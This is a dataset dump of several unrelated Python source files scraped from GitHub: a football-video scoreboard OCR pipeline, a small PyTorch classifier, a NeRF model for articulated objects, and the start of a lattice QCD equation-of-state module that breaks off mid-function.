lower_y = 80
time_divide = 230
time_width = 60
time_position = 'left'
# If time_position == 'right': the scoreboard is on the left and the time on the right.
# If time_position == 'left' : the scoreboard is on the right and the time on the left.
# To deal with time.sleep() and effectively end the threads
#time_value = 0
class ImageHandler(object):
    """Extracts frames from a match video and prepares scoreboard crops for OCR.

    Shares progress with the analyzer thread through attributes set on the
    module-level `ocr` function (ocr.count, ocr.video_length, ocr.eImageExported).
    """
    def __init__(self, export_path, filename_in):
        # Working images/texts produced by the pipeline stages below.
        self.scoreboard_image = None
        self.time_image = None
        self.time_text = None
        self.teams_goals_image = None
        self.teams_goals_text = None
        self.video_source_path = filename_in
        # Latest extracted frame is always written to the same file.
        self.export_image_path = export_path + '/football.jpg'
        self.export_path = export_path
        logging.basicConfig(level=logging.WARNING)
    def extract_image_from_video(self):
        """
        Extracts image from video and saves on disk with specified period.
        :param path_to_video: Path to video and video name with file format
        :param export_image_path: Export image path and image name with file format
        :return: -
        """
        vidcap = cv2.VideoCapture(self.video_source_path)
        count = 0
        #success = True
        image_lst = []
        while(True):
            # Seek one second further on each iteration (period = 1 s).
            vidcap.set(cv2.CAP_PROP_POS_MSEC, (count * 1000))
            success, image = vidcap.read()
            image_lst.append(image)
            # Stop when last frame is identified
            if count > 1:
                if np.array_equal(image, image_lst[1]):
                    break
                image_lst.pop(0) # Clean the list
            # save frame as PNG file
            if(ocr.count < ocr.video_length):
                try:
                    cv2.imwrite(self.export_image_path, image)
                    print('{}.sec reading a new frame: {} '.format(count, success))
                    count += 1
                    ocr.count += 1
                    # Wake the analyzer thread waiting on this event.
                    ocr.eImageExported.set()
                    time.sleep(1)
                except Exception as e:
                    # Best-effort: a failed write/seek skips this frame.
                    pass
    def localize_scoreboard_image(self):
        """
        Finds the scoreboard table in the upper corner, sets scoreboard_image
        and exports the picture as 'scoreboard_table.jpg'
        :return: True when scoreboard is found
                 False when scoreboard is not found
        """
        # Read a snapshot image from the video and convert to gray
        snapshot_image = cv2.imread(self.export_image_path)
        grayscale_image = cv2.cvtColor(snapshot_image, cv2.COLOR_BGR2GRAY)
        # Crop using the module-level scoreboard coordinates.
        self.scoreboard_image = grayscale_image[upper_y:lower_y,
                                                left_x:right_x]
        cv2.imwrite(self.export_path + '/scoreboard_table.jpg',
                    self.scoreboard_image)
    def split_scoreboard_image(self):
        """
        Splits the scoeboard image into two parts, sets 'time_image' and 'teams_goals_image'
        and exports as 'time_table.jpg' and 'teams_goals_table.jpg'
        Left image represents the time.
        Right image represents the teams and goals.
        :return: -
        """
        '''
        self.time_image = self.scoreboard_image[:, 0:175]
        cv2.imwrite('ocr/img/time_table.jpg', self.time_image)
        self.teams_goals_image = self.scoreboard_image[:, 175:]
        cv2.imwrite('ocr/img/teams_goals_table.jpg', self.teams_goals_image)
        '''
        # Convert the absolute split column into scoreboard-crop coordinates.
        relative_time_divide = time_divide-left_x
        time_end = relative_time_divide + time_width
        if(time_position == 'right'):
            self.time_image = self.scoreboard_image[:,
                                                    relative_time_divide:time_end]
            cv2.imwrite(self.export_path + '/time_table.jpg', self.time_image)
            self.teams_goals_image = self.scoreboard_image[:,
                                                           0:relative_time_divide]
            cv2.imwrite(self.export_path + '/teams_goals_table.jpg',
                        self.teams_goals_image)
        else:
            self.time_image = self.scoreboard_image[:, 0:relative_time_divide]
            cv2.imwrite(self.export_path + '/time_table.jpg', self.time_image)
            self.teams_goals_image = self.scoreboard_image[:,
                                                           relative_time_divide:]
            cv2.imwrite(self.export_path + '/teams_goals_table.jpg',
                        self.teams_goals_image)
    def enlarge_scoreboard_images(self, enlarge_ratio):
        """
        Enlarges 'time_table.jpg' and 'teams_goals_table.jpg'
        :param enlarge_ratio: Defines the enlarging size (e.g 2-3x)
        :return: -
        """
        self.time_image = cv2.resize(
            self.time_image, (0, 0), fx=enlarge_ratio, fy=enlarge_ratio)
        self.teams_goals_image = cv2.resize(
            self.teams_goals_image, (0, 0), fx=enlarge_ratio, fy=enlarge_ratio)
    def _get_time_from_image(self):
        """
        Preprocesses time_image transformations for OCR.
        Exports 'time_ocr_ready.jpg' after the manipulations.
        Reads match time from 'time_ocr_ready.jpg' using Tesseract.
        Applies result to time_text.
        :return: True: string is found
                 False: string is not found
        """
        # Count nonzero to determine contrast type
        # NOTE(review): `threshed_img` is never used below -- the blur/erode/
        # dilate chain operates on the unthresholded image. Confirm intended.
        ret, threshed_img = cv2.threshold(
            self.time_image, 0, 255, cv2.THRESH_OTSU+cv2.THRESH_BINARY_INV)
        self.time_image = cv2.GaussianBlur(self.time_image, (3, 3), 0)
        kernel = np.ones((3, 3), np.uint8)
        self.time_image = cv2.erode(self.time_image, kernel, iterations=1)
        self.time_image = cv2.dilate(self.time_image, kernel, iterations=1)
        cv2.imwrite(self.export_path + '/time_ocr_ready.jpg', self.time_image)
        self.time_text = pytesseract.image_to_string(
            Image.open(self.export_path + '/time_ocr_ready.jpg'), config="--psm 6")
        logging.info('Time OCR text: {}'.format(self.time_text))
        if self.time_text is not None:
            return True
        return False
    def _get_teams_goals_from_image(self):
        """
        Preprocesses teams_goals_image with transformations for OCR.
        Exports 'teams_goals_ocr_ready.jpg' after the manipulations.
        Reads teams and goals information from 'teams_goals_ocr_ready.jpg' using Tesseract.
        Applies result to teams_goals_text.
        :return: True: string is found
                 False: string is not found
        """
        # Applying Thresholding for Teams goals OCR preprocess
        ret, self.teams_goals_image = cv2.threshold(
            self.teams_goals_image, 0, 255, cv2.THRESH_OTSU+cv2.THRESH_BINARY_INV)
        self.teams_goals_image = cv2.GaussianBlur(
            self.teams_goals_image, (3, 3), 0)
        kernel = np.ones((3, 3), np.uint8)
        #self.teams_goals_image = cv2.erode(self.teams_goals_image, kernel, iterations=1)
        self.teams_goals_image = cv2.dilate(
            self.teams_goals_image, kernel, iterations=1)
        cv2.imwrite(self.export_path + '/teams_goals_ocr_ready.jpg',
                    self.teams_goals_image)
        self.teams_goals_text = pytesseract.image_to_string(
            Image.open(self.export_path + '/teams_goals_ocr_ready.jpg'))
        logging.info('Teams and goals OCR text: {}'.format(
            self.teams_goals_text))
        if self.teams_goals_text is not None:
            return True
        return False
    def get_scoreboard_texts(self):
        """
        Returns an array of strings including OCR read time, teams and goals texts.
        :return: numpy array 'scoreboard_texts'
                 scoreboard_texts[0] : time text value
                 scoreboard_texts[1] : teams and goals text value
        """
        # Read text values using Tesseract OCR
        time_text_exists = self._get_time_from_image()
        teams_goals_text_exists = self._get_teams_goals_from_image()
        scoreboard_texts = []
        # Use values on successful read
        if time_text_exists and teams_goals_text_exists:
            scoreboard_texts.append(self.time_text)
            scoreboard_texts.append(self.teams_goals_text)
        scoreboard_texts = np.array(scoreboard_texts)
        return scoreboard_texts
    def play_match_video(self):
        """Display the match video in grayscale, one frame per second ('q' quits)."""
        cap = cv2.VideoCapture(self.video_source_path)
        count = 0
        # NOTE(review): `ocr.time_value` is never assigned anywhere (only the
        # commented-out module-level `time_value`) -- this branch would raise
        # AttributeError if reached. Confirm before use.
        if(ocr.time_value < ocr.video_length):
            while (cap.isOpened()):
                cap.set(cv2.CAP_PROP_POS_MSEC, (count * 1000))
                ret, frame = cap.read()
                gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
                cv2.imshow('frame', gray)
                time.sleep(1)
                count += 1
                if cv2.waitKey(1) & 0xFF == ord('q'):
                    break
        cap.release()
        cv2.destroyAllWindows()
class Match(object):
    """Holds the evolving match state (teams, score, clock) parsed from OCR text.

    `*_temp` attributes hold raw cleansed OCR candidates; the non-temp
    attributes are only updated after validation. Reads shared state from the
    module-level `ocr` function attributes (ocr.count, ocr.eImageExported, ...).
    """
    def __init__(self, export_path, filename_out):
        self.scoreboard_text_values = None
        self.home_score = 0
        self.home_score_temp = 0
        self.home_team = None
        self.home_team_temp = 0
        self.home_team_fullname = None
        self.home_team_identified = False
        self.opponent_score = 0
        self.opponent_score_temp = 0
        self.opponent_team = None
        self.opponent_team_temp = None
        self.opponent_team_fullname = None
        self.opponent_team_identified = False
        self.match_time = None
        self.match_time_temp = None
        # Rolling window of the last valid time strings (for error correction).
        self._match_time_prev = []
        self.export_path = export_path
        self.filename_out = filename_out
    def analize_scoreboard(self):
        """Worker-thread loop: wait for each exported frame, OCR it, update state.

        Runs until ocr.count reaches ocr.video_length; any per-frame failure is
        logged and the loop continues with the next frame.
        """
        while (ocr.count < ocr.video_length):
            try:
                ocr.eImageExported.wait()
                ocr.scoreboard.localize_scoreboard_image()
                ocr.scoreboard.split_scoreboard_image()
                ocr.scoreboard.enlarge_scoreboard_images(3)
                OCR_text = ocr.scoreboard.get_scoreboard_texts()
                ocr.football_match.provide_scoreboard_text_values(OCR_text)
                ocr.football_match.update_all_match_info()
                ocr.football_match.print_all_match_info()
                ocr.eImageExported.clear()
            except Exception as e:
                logging.warning(e)
    def provide_scoreboard_text_values(self, scoreboard_text_values):
        # Inject the latest [time_text, teams_goals_text] array from OCR.
        self.scoreboard_text_values = scoreboard_text_values
    def cleanse_match_score(self):
        """
        Cleanse home_score_temp and opponent_score_temp values and removes
        noisy starters and enders if present
        :return: -
        """
        # The score ("d-d") is the middle token of "TEAM d-d TEAM".
        score_string = self.scoreboard_text_values[1].split(' ')[1]
        result = []
        for letter in score_string:
            if letter.isdigit():
                result += letter
        self.home_score_temp = result[0]
        self.opponent_score_temp = result[1]
    def cleanse_match_teams(self):
        """
        Cleanse home_team_temp and opponent_team_temp values and removes
        noisy starter or ender if present
        :return: -
        """
        self.home_team_temp = self.scoreboard_text_values[1].split(' ')[0]
        self.opponent_team_temp = self.scoreboard_text_values[1].split(' ')[2]
        # Check and remove noisy starters and enders
        if not self.home_team_temp[0].isalpha():
            self.home_team_temp = self.home_team_temp[1:4]
        elif not self.opponent_team_temp[-1].isalpha():
            self.opponent_team_temp = self.opponent_team_temp[0:3]
    def cleanse_match_time(self):
        """
        Cleanse match_time_temp, and removes noisy starter or ender if present
        :return: -
        """
        self.match_time_temp = self.scoreboard_text_values[0]
        # Check for noisy starters and ender and clean if present
        letter_ptr = 0
        if not self.match_time_temp[letter_ptr].isdigit():
            # Strip up to two leading non-digit characters.
            letter_ptr += 1
            if not self.match_time_temp[letter_ptr].isdigit():
                letter_ptr += 1
            self.match_time_temp = self.match_time_temp[letter_ptr:]
            logging.info("Time text noisy starter removed.")
        elif not self.match_time_temp[-1].isdigit():
            self.match_time_temp = self.match_time_temp[0:-1]
            logging.info("Time text noisy ender removed.")
    def update_match_time(self):
        """
        Validates cleansed match_time_temp with regular expression and sets match_time if valid value exists
        :return: True: time has been updated
                 False: time has not been updated
        """
        # Check if the OCR read value is valid
        # NOTE(review): prefer a raw string (r'\d\d:\d\d') for regex patterns.
        time_expr = re.compile('\d\d:\d\d')
        res = time_expr.search(self.match_time_temp)
        if res is None:
            return False
        last_valid_timeval = self.match_time_temp[res.start():res.end()]
        self._match_time_prev.append(last_valid_timeval)
        # Check validity between last time values
        # Match clocks only count up, so a decrease means a misread digit.
        if last_valid_timeval < self._match_time_prev[len(self._match_time_prev)-2]:
            # Minute error occured - minute remain unchanged
            if last_valid_timeval[0:2] < self._match_time_prev[len(self._match_time_prev)-2][0:2]:
                logging.warning(
                    "Minute error occured: minute remain unchanged!")
                fixed_minutes = self._match_time_prev[len(
                    self._match_time_prev)-2][0:2]
                last_valid_timeval = fixed_minutes + last_valid_timeval[2:]
            else:
                # Second error occured - auto increment second
                logging.warning(
                    "Second error occured: auto incremented second!")
                seconds = self._match_time_prev[len(
                    self._match_time_prev)-2][-2:]
                fixed_seconds = str(int(seconds)+1)
                last_valid_timeval = last_valid_timeval[:-2] + fixed_seconds
        # Free unnecessary time values
        if len(self._match_time_prev) > 2:
            self._match_time_prev.pop(0)
        # Write all valid values to a text file for analysis
        self.match_time = last_valid_timeval
        with open(self.export_path + '/' + self.filename_out, 'a') as f:
            f.write("%s,%s\n" % (self.match_time, ocr.count))
        return True
    def update_match_score(self):
        """
        Validates cleansed score with regular expression
        :return: True: score matches the regexp
                 False: score does not match the regexp
        """
        score_expr = re.compile('\d-\d')
        res = score_expr.search(self.scoreboard_text_values[1])
        if res is None:
            return False
        self.home_score = self.home_score_temp
        self.opponent_score = self.opponent_score_temp
        return True
    def update_match_team(self, selected_team):
        """
        Sets cleansed home_team or opponent_team values if not set before
        :return: -
        """
        if selected_team == 'home':
            self.home_team = self.home_team_temp
            self.home_team_identified = True
        elif selected_team == 'opponent':
            self.opponent_team = self.opponent_team_temp
            self.opponent_team_identified = True
    def update_all_match_info(self):
        """
        Attempts to update match infos:
        time, teams, score
        :return: True: update succeed
                 False: update failed
        """
        if len(self.scoreboard_text_values[0]) > 0 and len(self.scoreboard_text_values[1]) > 0:
            try:
                # Clean OCR read time value and update time if valid
                self.cleanse_match_time()
                self.update_match_time()
                # Clean OCR read score value and update score if valid
                self.cleanse_match_score()
                self.update_match_score()
                # Clean OCR read team values and set teams if valid and necessary
                self.cleanse_match_teams()
                if self.home_team_identified is False:
                    self.update_match_team('home')
                if self.opponent_team_identified is False:
                    self.update_match_team('opponent')
            except Exception as e:
                logging.info(e)
                logging.info("Unable to update match info for some reason")
        else:
            logging.info("Unable to update match info: no text received!")
    def print_all_match_info(self):
        """Print "time HOME h-o AWAY", preferring full team names when known."""
        home_team_name = self.home_team
        opponent_team_name = self.opponent_team
        if self.home_team_fullname is not None and self.opponent_team_fullname is not None:
            home_team_name = self.home_team_fullname
            opponent_team_name = self.opponent_team_fullname
        print('{} {} {}-{} {}'.format(self.match_time,
                                      home_team_name,
                                      self.home_score,
                                      self.opponent_score,
                                      opponent_team_name))
# MAIN
def ocr(export_path, filename_in, filename_out, video_length):
    """Run the OCR pipeline: frame extraction and scoreboard analysis in parallel.

    :param export_path: directory receiving intermediate images and the output file
    :param filename_in: path to the input match video
    :param filename_out: name of the text file receiving "time,frame" rows
    :param video_length: number of seconds (frames at 1 fps) to process
    """
    # State shared between the two worker threads is stored as attributes on
    # this function object (ocr.count, ocr.eImageExported, ...).
    ocr.count = 0
    ocr.video_length = video_length
    # Truncate the output file before appending new results.
    open(export_path+'/' + filename_out, 'w').close()
    ocr.eImageExported = threading.Event()
    # Create objects and threads
    ocr.scoreboard = ImageHandler(export_path, filename_in)
    ocr.football_match = Match(export_path, filename_out)
    ocr.tImageExtractor = threading.Thread(
        None, ocr.scoreboard.extract_image_from_video, name="ImageExtractor")
    ocr.tScoreboardAnalyzer = threading.Thread(
        None, ocr.football_match.analize_scoreboard, name="ScoreboardAnalyzer")
    ocr.tImageExtractor.start()
    ocr.tScoreboardAnalyzer.start()
    ocr.tImageExtractor.join()
    ocr.tScoreboardAnalyzer.join()
if __name__ == '__main__' :
    # Script entry point: run the OCR pipeline on a sample match video.
    filename_in = 'ocr/tmp/secondmatch.mkv'
    export_path = 'ocr/img'
    filename_out = 'times.txt'
    # Match length in seconds. NOTE(review): the ocr() call below passes the
    # literal 1080 instead of this variable -- keep the two in sync.
    video_length = 1080
ocr(export_path, filename_in, filename_out, 1080) | BrunoSader/An-emotional-sports-highlight-generator | ocr/final_ocr.py | final_ocr.py | py | 18,525 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "logging.basicConfig",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "logging.WARNING",
"line_number": 46,
"usage_type": "attribute"
},
{
"api_name": "cv2.VideoCapture",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "cv2.CAP_PRO... |
35153410551 | import torch
import torch.nn as nn
class Net(nn.Module):
    """Fully connected MNIST-style classifier: 784 -> 256 -> 128 -> 10.

    Each hidden layer is followed by batch normalization and ReLU; the first
    linear layer omits its bias since BatchNorm1d supplies an affine shift.
    """
    def __init__(self):
        super(Net, self).__init__()
        # Layer creation order matches the reference implementation so that
        # parameter initialization and state_dict keys are identical.
        self.fc1 = nn.Linear(784, 256, bias=False)
        self.bn1 = nn.BatchNorm1d(256)
        self.relu1 = nn.ReLU()
        self.fc2 = nn.Linear(256, 128)
        self.bn2 = nn.BatchNorm1d(128)
        self.relu2 = nn.ReLU()
        self.fc3 = nn.Linear(128, 10)

    def forward(self, x):
        # Flatten each sample, then apply the two hidden stages and the head.
        x = torch.flatten(x, 1)
        x = self.relu1(self.bn1(self.fc1(x)))
        x = self.relu2(self.bn2(self.fc2(x)))
        x = self.fc3(x)
return x | Sachi-27/WiDS--Image-Captioning | Week 2/model.py | model.py | py | 649 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 4,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_numbe... |
34203757063 | import torch
import torch.nn as nn
from math import sin, cos
import models
from models.base import BaseModel
from models.utils import chunk_batch
from systems.utils import update_module_step
from nerfacc import ContractionType, OccupancyGrid, ray_marching
from nerfacc.vol_rendering import render_transmittance_from_alpha, rendering
from utils.rotation import R_from_quaternions
@models.register('se3')
class SE3Model(BaseModel):
    """Two-field NeRF (static + dynamic part) whose dynamic part moves by a
    learnable SE(3) transform (quaternion rotation + translation) between two
    observed articulation states (state 0 and state 1)."""
    def setup(self):
        # Separate geometry/texture networks for the static and dynamic parts.
        self.static_geometry = models.make(self.config.geometry.name, self.config.geometry)
        self.static_texture = models.make(self.config.texture.name, self.config.texture)
        self.dynamic_geometry = models.make(self.config.geometry.name, self.config.geometry)
        self.dynamic_texture = models.make(self.config.texture.name, self.config.texture)
        init_angle = self.config.get('init_angle', 0.1)
        init_dir = self.config.get('init_dir', [1., 1., 1.])
        # Learnable motion parameters: unit quaternion and translation.
        self.quaternions = nn.Parameter(self.init_quaternions(half_angle=init_angle, init_dir=init_dir), requires_grad=True)
        self.translation = nn.Parameter(torch.tensor([0.001, 0.001, 0.001], dtype=torch.float32), requires_grad=True)
        # The canonical (reference) state lies midway between state 0 and 1.
        self.canonical = 0.5
        self.register_buffer('scene_aabb', torch.as_tensor([-self.config.radius, -self.config.radius, -self.config.radius, self.config.radius, self.config.radius, self.config.radius], dtype=torch.float32))
        if self.config.grid_prune:
            self.grid_warmup = self.config['grid_warmup']
            self.occupancy_grid = OccupancyGrid(
                roi_aabb=self.scene_aabb,
                resolution=128, # the resolution is open to discuss
                contraction_type=ContractionType.AABB
            )
        self.randomized = self.config.randomized
        if self.config.white_bkgd:
            self.register_buffer('background_color', torch.as_tensor([1.0, 1.0, 1.0], dtype=torch.float32), persistent=False)
            self.background_color.to(self.rank)
        # Step length chosen so ~num_samples_per_ray samples span the AABB diagonal.
        self.render_step_size = 1.732 * 2 * self.config.radius / self.config.num_samples_per_ray
    def update_step(self, epoch, global_step):
        """Per-step hook: advance texture schedules and refresh the occupancy grid."""
        update_module_step(self.static_texture, epoch, global_step)
        update_module_step(self.dynamic_texture, epoch, global_step)
        def occ_eval_fn(x):
            # Occupancy is the combined static + dynamic density at x.
            density_s, _ = self.static_geometry(x)
            x_d = self.rigid_transform(x)
            density_d, _ = self.dynamic_geometry(x_d)
            density = density_s + density_d
            return density[...,None] * self.render_step_size
        if self.training and self.config.grid_prune:
            self.occupancy_grid.every_n_step(step=global_step, occ_eval_fn=occ_eval_fn, occ_thre=1e-4, warmup_steps=self.grid_warmup)
    def isosurface(self):
        """Extract meshes for both parts; returns {'static': mesh, 'dynamic': mesh}."""
        mesh_s = self.static_geometry.isosurface()
        mesh_d = self.dynamic_geometry.isosurface()
        return {'static': mesh_s, 'dynamic': mesh_d}
    def init_quaternions(self, half_angle, init_dir):
        """Build a unit quaternion rotating by 2*half_angle about init_dir."""
        a = torch.tensor([init_dir[0], init_dir[1], init_dir[2]], dtype=torch.float32)
        a = torch.nn.functional.normalize(a, p=2., dim=0)
        sin_ = sin(half_angle)
        cos_ = cos(half_angle)
        r = cos_
        i = a[0] * sin_
        j = a[1] * sin_
        k = a[2] * sin_
        q = torch.tensor([r, i, j, k], dtype=torch.float32)
        return q
    def rigid_transform(self, positions, state=0.):
        '''
        Perform the rigid transformation: R_axis_d,rot_angle(center=axis_o) @ x + t
        '''
        # state 0 -> scaling 1 (forward transform); state 1 -> -1 (inverse).
        scaling = (self.canonical - state) / self.canonical
        if scaling == 1.:
            R = R_from_quaternions(self.quaternions)
            positions = torch.matmul(R, positions.T).T
            positions = positions + self.translation
        elif scaling == -1.:
            # Inverse: undo translation, then rotate by the conjugate quaternion.
            positions = positions - self.translation
            inv_sc = torch.tensor([1., -1., -1., -1]).to(self.quaternions)
            inv_q = inv_sc * self.quaternions
            R = R_from_quaternions(inv_q)
            positions = torch.matmul(R, positions.T).T
        else:
            raise NotImplementedError
        return positions
    def forward_(self, rays, scene_state):
        """Render one batch of rays (N, 6) = (origin, direction) at `scene_state`."""
        rays_o, rays_d = rays[:, 0:3], rays[:, 3:6] # both (N_rays, 3)
        def sigma_fn_composite(t_starts, t_ends, ray_indices):
            # Combined static+dynamic density used for ray marching.
            ray_indices = ray_indices.long()
            t_origins = rays_o[ray_indices]
            t_dirs = rays_d[ray_indices]
            positions = t_origins + t_dirs * (t_starts + t_ends) / 2.
            sigma_s, _ = self.static_geometry(positions)
            positions = self.rigid_transform(positions, scene_state)
            sigma_d, _ = self.dynamic_geometry(positions)
            sigma = sigma_s + sigma_d
            return sigma[...,None]
        def rgb_sigma_fn_static(t_starts, t_ends, ray_indices):
            ray_indices = ray_indices.long()
            t_origins = rays_o[ray_indices]
            t_dirs = rays_d[ray_indices]
            positions = t_origins + t_dirs * (t_starts + t_ends) / 2.
            density, feature = self.static_geometry(positions)
            rgb = self.static_texture(feature, t_dirs)
            return rgb, density[...,None]
        def rgb_sigma_fn_dynamic(t_starts, t_ends, ray_indices):
            ray_indices = ray_indices.long()
            t_origins = rays_o[ray_indices]
            t_dirs = rays_d[ray_indices]
            positions = t_origins + t_dirs * (t_starts + t_ends) / 2.
            # Query the dynamic field in its canonical frame.
            positions = self.rigid_transform(positions, scene_state)
            density, feature = self.dynamic_geometry(positions)
            # NOTE(review): rigid_transform also applies the translation to the
            # direction vectors; directions are usually rotated only -- confirm.
            dirs_d = self.rigid_transform(t_dirs, scene_state)
            rgb = self.dynamic_texture(feature, dirs_d)
            return rgb, density[...,None]
        def composite_rendering(ray_indices, t_starts, t_ends):
            # Alpha-composite the two fields sample-by-sample along each ray.
            n_rays = rays_o.shape[0]
            rgb_s, sigma_s = rgb_sigma_fn_static(t_starts, t_ends, ray_indices)
            rgb_d, sigma_d = rgb_sigma_fn_dynamic(t_starts, t_ends, ray_indices)
            dists = t_ends - t_starts
            alpha_s = 1. - torch.exp(-sigma_s * dists)
            alpha_d = 1. - torch.exp(-sigma_d * dists)
            # Combined alpha of two overlapping media.
            alpha_add = 1. - (1. - alpha_s) * (1. - alpha_d)
            Ts = render_transmittance_from_alpha(alpha_add, ray_indices=ray_indices)
            weights_s = alpha_s * Ts
            weights_d = alpha_d * Ts
            weights = weights_s + weights_d
            # opacity
            opacity = self.acc_along_rays(weights, ray_indices, n_rays)
            opacity = opacity.squeeze(-1)
            # acc color
            rgb = weights_s * rgb_s + weights_d * rgb_d
            rgb = self.acc_along_rays(rgb, ray_indices, n_rays)
            # Background composition.
            if self.config.white_bkgd:
                rgb = rgb + self.background_color * (1. - opacity[..., None])
            # validation and testing
            if not self.training:
                # depth
                depth = weights * ((t_starts + t_ends) * 0.5)
                depth = self.acc_along_rays(depth, ray_indices, n_rays)
                depth = depth.squeeze(-1)
                # Also render each part alone for diagnostics.
                rgb_s_only, opacity_s, depth_s_only = rendering(t_starts, t_ends, ray_indices, n_rays,
                                                                rgb_sigma_fn=rgb_sigma_fn_static,
                                                                render_bkgd=self.background_color)
                rgb_d_only, opacity_d, depth_d_only = rendering(t_starts, t_ends, ray_indices, n_rays,
                                                                rgb_sigma_fn=rgb_sigma_fn_dynamic,
                                                                render_bkgd=self.background_color)
                return {
                    'rgb': rgb,
                    'opacity': opacity,
                    'depth': depth,
                    'rgb_s': rgb_s_only,
                    'rgb_d': rgb_d_only,
                    'depth_s': depth_s_only,
                    'depth_d': depth_d_only,
                    'opacity_s': opacity_s,
                    'opacity_d': opacity_d,
                }
            return {
                'rgb': rgb,
                'rays_valid': opacity > 0,
                'opacity': opacity,
            }
        # Sample points along rays (no gradients through the marcher itself).
        with torch.no_grad():
            ray_indices, t_starts, t_ends = ray_marching(
                rays_o, rays_d,
                scene_aabb=self.scene_aabb,
                grid=self.occupancy_grid if self.config.grid_prune else None,
                sigma_fn=sigma_fn_composite,
                render_step_size=self.render_step_size,
                stratified=self.randomized,
            )
        render_out = composite_rendering(ray_indices, t_starts, t_ends)
        if self.training:
            return {
                'comp_rgb': render_out['rgb'],
                'opacity': render_out['opacity'],
                'rays_valid': render_out['rays_valid'],
                'num_samples': torch.as_tensor([len(t_starts)], dtype=torch.int32, device=rays.device),
            }
        return {
            'comp_rgb': render_out['rgb'],
            'opacity': render_out['opacity'],
            'depth': render_out['depth'],
            'rgb_s': render_out['rgb_s'],
            'rgb_d': render_out['rgb_d'],
            'depth_s': render_out['depth_s'],
            'depth_d': render_out['depth_d'],
            'opacity_s': render_out['opacity_s'],
            'opacity_d': render_out['opacity_d'],
        }
    def forward(self, rays_0, rays_1):
        """Render both articulation states; chunked when not training."""
        if self.training:
            out_0 = self.forward_(rays_0, scene_state=0.)
            out_1 = self.forward_(rays_1, scene_state=1.)
        else:
            out_0 = chunk_batch(self.forward_, self.config.ray_chunk, rays_0, scene_state=0.)
            out_1 = chunk_batch(self.forward_, self.config.ray_chunk, rays_1, scene_state=1.)
        del rays_0, rays_1
        return [{**out_0}, {**out_1}]
    def train(self, mode=True):
        # Stratified sampling only while training (and if enabled in config).
        self.randomized = mode and self.config.randomized
        return super().train(mode=mode)
    def eval(self):
        self.randomized = False
        return super().eval()
    def regularizations(self, outs):
        # No model-specific regularization terms for this model.
        losses = {}
return losses | 3dlg-hcvc/paris | models/se3.py | se3.py | py | 10,421 | python | en | code | 31 | github-code | 36 | [
{
"api_name": "models.base.BaseModel",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "models.make",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "models.make",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "models.make",
"line... |
2109558152 | import numpy as np
import pandas as pd
from math import factorial, pi
import scipy.optimize
import scipy.misc
import os
import re
import argparse
from sklearn.gaussian_process import GaussianProcessRegressor
from sklearn.gaussian_process.kernels import RBF,ConstantKernel
# for tests
#import matplotlib.pyplot as pl
# directory where the fit_lattice_test.py is located
dir_path = os.path.dirname(os.path.realpath(__file__))
########################################################################
# Module usage text and CLI setup: running the file directly only prints
# the help text below (no positional arguments are defined).
if __name__ == "__main__":
    __doc__="""Construct a parametrization (from PhysRevC.100.064910) of the lattice QCD equation of state
(P/T^4, n/T^3, s/T^3, e/T^4) by calling function:
- param(T,muB,muQ,muS)
input: temperature and chemical potentials in [GeV]
output: dictionnary of all quantities ['T','P','s','n_B','n_Q','n_S','e']
Produces lattice data for P/T^4, nB/T^3, s/T^3, e/T^4 as a function of T for a single value of muB:
- lattice_data(EoS,muB)
input: - EoS: - 'muB' refers to the EoS with the condition \mu_Q = \mu_S = 0
- 'nS0' refers to the EoS with the condition <n_S> = 0 & <n_Q> = 0.4 <n_B>
- muB: baryon chemical potential in [GeV]
output: dictionnary of all quantities + error ['T','P','s','n_B','e']
Calculation of the equation of state under the conditions: <n_S> = 0 ; <n_Q> = factQB*<n_B>:
- EoS_nS0(fun,T,muB,**kwargs)
input: - fun: any function which calculate an EoS (by ex: param, HRG, full_EoS)
- T,muB: temperature and baryon chemical potential in [GeV]
output: dictionnary of all quantities ['T','P','s','n_B','e']
"""
    # RawTextHelpFormatter preserves the line breaks of the usage text above
    parser = argparse.ArgumentParser(
        description=__doc__,
        formatter_class=argparse.RawTextHelpFormatter
    )
    args = parser.parse_args()
###############################################################################
# J. Phys.: Conf. Ser. 1602 012011
# Pseudo-critical temperature from the lattice at \mu_B = 0 [GeV].
Tc0 = 0.158
# Curvature coefficients of the transition line T_c(\mu_B).
kappa2 = 0.0153
kappa4 = 0.00032
###############################################################################
def Tc_lattice(muB):
    """
    Lattice-QCD transition temperature T_c(\mu_B) [GeV] for a baryon
    chemical potential muB [GeV] (J. Phys.: Conf. Ser. 1602 012011).
    """
    ratio = muB/Tc0
    return Tc0*(1. - kappa2*ratio**2. - kappa4*ratio**4.)
###############################################################################
def dTcdmuB_lattice(muB):
    """
    Slope dT_c/d\mu_B of the lattice transition line at the given
    muB [GeV] (analytic derivative of Tc_lattice).
    """
    return -2.*muB*kappa2/Tc0 -4.*(muB**3.)*kappa4/Tc0**3.
def Tc_lattice_muBoT(muBoT):
    """
    Critical temperature along a line of fixed ratio muB/T.

    Solves muB/T_c(muB) = muBoT for muB with a Levenberg-Marquardt root
    find, then evaluates T_c there. The muBoT == 0 case is handled directly.
    """
    if muBoT == 0:
        return Tc_lattice(0.)
    sol = scipy.optimize.root(lambda muB: muB/Tc_lattice(muB)-muBoT,
                              [muBoT*Tc0], method='lm')
    return Tc_lattice(sol.x[0])
###############################################################################
# SB limits
###############################################################################
def SB_lim(T,muB,muQ,muS,Nf=3):
    """
    Stefan-Boltzmann (ideal massless parton gas) limit of the QGP EoS.

    Parameters
    ----------
    T : float or numpy array / list of floats
        temperature in GeV
    muB, muQ, muS : float (or arrays matching T)
        baryon, electric charge and strangeness chemical potentials in GeV
    Nf : int, optional
        number of quark flavors included (0, 2 or 3); default 3

    Returns
    -------
    dict with scaled quantities: 'P'=P/T^4, 's'=s/T^3, 'n_B','n_Q','n_S'=n/T^3,
    'e'=e/T^4, 'I'=(e-3P)/T^4 (trace anomaly, zero here), 'cs^2'=1/3
    """
    Nc = 3 # number of colors
